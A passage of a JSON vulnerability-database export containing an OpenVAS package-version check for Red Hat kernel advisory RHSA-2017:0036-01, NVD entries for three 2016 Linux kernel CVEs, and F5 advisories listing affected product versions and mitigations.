rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "title": "RedHat Update for kernel RHSA-2017:0036-01", "type": "openvas", "viewCount": 6}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-07-27T10:57:15"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "1693b96dcccf4fbcd463bf8baaa2bf3f"}, {"key": "href", "hash": "ecdc2643d713b3eb6cd330f4da8f9899"}, {"key": "modified", "hash": "55b5f288c0c073cab7832e1f46b617e7"}, {"key": "naslFamily", "hash": "b46559ea68ec9a13474c3a7776817cfd"}, {"key": "pluginID", "hash": "feceaea3db20f1b814abfc37b7161f7a"}, {"key": "published", "hash": "93a870a4cbcc9909bb7a08ec42ea9932"}, {"key": "references", "hash": "09523d8f0673a86c66db6888d75720f7"}, {"key": "reporter", "hash": "a2323bbbec1269474bb5afba0147298f"}, {"key": "sourceData", "hash": "5c5c32830240d94d805c8e1a5d3970ee"}, {"key": "title", "hash": "c6d142ba7241ded12da1b709539a85f1"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "fd56156352eaf9623daa527179fc2cb17788bfc9326a091e515e9bc543ef844c", "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n * An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n * A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n * When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n * When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n * From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n * When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n * When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0036-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "1361412562310871742"}

{"cve": [{"lastseen": "2018-01-05T11:52:23", "references": ["http://rhn.redhat.com/errata/RHSA-2017-0036.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1382268", "http://rhn.redhat.com/errata/RHSA-2017-0196.html", "http://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.5.2", "https://security-tracker.debian.org/tracker/CVE-2016-7117", "http://rhn.redhat.com/errata/RHSA-2017-0065.html", "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=34b88a68f26a75e4fded796f1a49c40f82234b7d", "http://source.android.com/security/bulletin/2016-10-01.html", "https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7117.html", "http://rhn.redhat.com/errata/RHSA-2017-0113.html", "http://rhn.redhat.com/errata/RHSA-2017-0091.html", "http://www.securityfocus.com/bid/93304", "http://rhn.redhat.com/errata/RHSA-2017-0270.html", "https://bugzilla.novell.com/show_bug.cgi?id=1003077", "http://rhn.redhat.com/errata/RHSA-2017-0086.html", "http://rhn.redhat.com/errata/RHSA-2017-0217.html", "http://rhn.redhat.com/errata/RHSA-2016-2962.html", "http://rhn.redhat.com/errata/RHSA-2017-0031.html", "https://github.com/torvalds/linux/commit/34b88a68f26a75e4fded796f1a49c40f82234b7d", "http://rhn.redhat.com/errata/RHSA-2017-0215.html", "http://rhn.redhat.com/errata/RHSA-2017-0216.html"], "edition": 3, "description": "Use-after-free vulnerability in the __sys_recvmmsg function in net/socket.c in the Linux kernel before 4.5.2 allows remote attackers to execute arbitrary code via vectors involving a recvmmsg system call that is mishandled during error processing.", "reporter": "NVD", "published": "2016-10-10T07:00:13", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "title": "CVE-2016-7117", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2016-7117"], "scanner": [], "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04::~~lts~~~", "cpe:/o:linux:linux_kernel:4.5.1", "cpe:/o:debian:debian_linux:7.0"], "modified": "2018-01-04T21:31:11", "id": "CVE-2016-7117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7117", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T11:52:22", "references": ["http://rhn.redhat.com/errata/RHSA-2017-0036.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1367091", "https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html", "https://source.android.com/security/bulletin/2016-11-01.html", "http://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.5", "http://rhn.redhat.com/errata/RHSA-2017-0113.html", "http://www.openwall.com/lists/oss-security/2016/08/15/1", "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=bb1fceca22492109be12640d49f5ea5a544c6bb4", "http://rhn.redhat.com/errata/RHSA-2017-0091.html", "http://www.securityfocus.com/bid/92452", "http://rhn.redhat.com/errata/RHSA-2017-0086.html", "https://github.com/torvalds/linux/commit/bb1fceca22492109be12640d49f5ea5a544c6bb4"], "edition": 3, "description": "The tcp_check_send_head function in include/net/tcp.h in the Linux kernel before 4.7.5 does not properly maintain certain SACK state after a failed data copy, which allows local users to cause a denial of service (tcp_xmit_retransmit_queue use-after-free and system crash) via a crafted SACK option.", "reporter": "NVD", "published": "2016-10-16T17:59:08", "type": "cve", "title": "CVE-2016-6828", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2016-6828"], "scanner": [], "modified": "2018-01-04T21:31:07", "cpe": ["cpe:/o:linux:linux_kernel:4.7.4"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6828", "id": "CVE-2016-6828", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T11:52:16", "references": ["http://rhn.redhat.com/errata/RHSA-2017-0036.html", "http://www.securityfocus.com/bid/91451", "http://www.ubuntu.com/usn/USN-3020-1", "http://www.ubuntu.com/usn/USN-3019-1", "http://www.openwall.com/lists/oss-security/2016/06/24/5", "https://bugzilla.redhat.com/show_bug.cgi?id=1349886", "http://www.ubuntu.com/usn/USN-3017-2", "http://www.ubuntu.com/usn/USN-3016-1", "http://www.ubuntu.com/usn/USN-3017-1", "http://rhn.redhat.com/errata/RHSA-2016-1847.html", "http://rhn.redhat.com/errata/RHSA-2016-1875.html", "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html", "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00044.html", "http://www.ubuntu.com/usn/USN-3016-4", "http://www.ubuntu.com/usn/USN-3018-1", "https://github.com/torvalds/linux/commit/6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91", "http://www.ubuntu.com/usn/USN-3018-2", "http://www.securitytracker.com/id/1036171", "http://www.ubuntu.com/usn/USN-3016-3", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html", "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00055.html", "http://rhn.redhat.com/errata/RHSA-2016-1883.html", "http://www.ubuntu.com/usn/USN-3017-3", "http://www.ubuntu.com/usn/USN-3016-2", "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html", "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91", "http://www.debian.org/security/2016/dsa-3607"], "edition": 2, "description": "The IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel before 4.6 allows local users to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from kernel heap memory by leveraging in-container root access to provide a crafted offset value that leads to crossing a ruleset blob boundary.", "reporter": "NVD", "published": "2016-07-03T17:59:17", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "cve", "title": "CVE-2016-4998", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2016-4998"], "scanner": [], "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04::~~lts~~~", "cpe:/o:linux:linux_kernel:4.5.5", "cpe:/o:canonical:ubuntu_linux:14.04::~~lts~~~", "cpe:/o:canonical:ubuntu_linux:12.04::~~lts~~~", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:oracle:linux:7.0"], "modified": "2018-01-04T21:30:56", "id": "CVE-2016-4998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4998", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "f5": [{"lastseen": "2017-06-08T00:16:10", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned IDs 633655 and 633656 (BIG-IP), ID 663602 (BIG-IQ), ID 634365 (Enterprise Manager) and ID 634431 (F5 iWorkflow) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H635143 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| Linux kernel \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| Linux kernel \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| None| Medium| Linux kernel \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP DNS| 12.0.0 - 12.1.2| None| Medium| Linux kernel \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| Linux kernel \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Linux kernel \nBIG-IP WebSafe| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| None| Medium \n\n| Linux kernel \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Medium| Linux kernel \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ ADC| 4.5.0| None| Medium| Linux kernel \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Medium| Linux kernel \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| Linux kernel \nF5 iWorkflow| 2.0.0 - 2.0.2| None| Medium| Linux kernel \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Low| Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "reporter": "f5", "published": "2016-12-21T03:38:00", "title": "Kernel vulnerability CVE-2016-6828", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-6828"], "modified": "2017-04-06T16:50:00", "href": "https://support.f5.com/csp/article/K62442245", "id": "F5:K62442245", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-11-08T17:26:37", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/12000/700/sol12766.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL12766: ARX hotfix matrix\n", "reporter": "f5", "published": "2016-11-08T00:00:00", "title": "SOL51201255 - Linux kernel vulnerability CVE-2016-7117", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "ARX", "version": "6.4.0", "operator": "le"}], "cvelist": ["CVE-2016-7117"], "modified": "2016-11-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/51/sol51201255.html", "id": "SOL51201255", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:23", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned IDs 624722 and 624723 (BIG-IP), ID 625297 (BIG-IQ), and ID 461496 (ARX) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable \n\n| None \nARX| 6.2.0 - 6.4.0| None| Medium| Linux kernel \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable | None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable | None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable | None \nF5 iWorkflow| None| 2.0.0 - 2.0.1| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n", "reporter": "f5", "published": "2016-11-08T19:37:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-7117", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-7117"], "modified": "2016-11-08T19:37:00", "href": "https://support.f5.com/csp/article/K51201255", "id": "F5:K51201255", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:35", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned CPF-23377, CPF-23378, and CPF-23379 (Traffix SDC) to this vulnerability.\n\nTo determine if your release 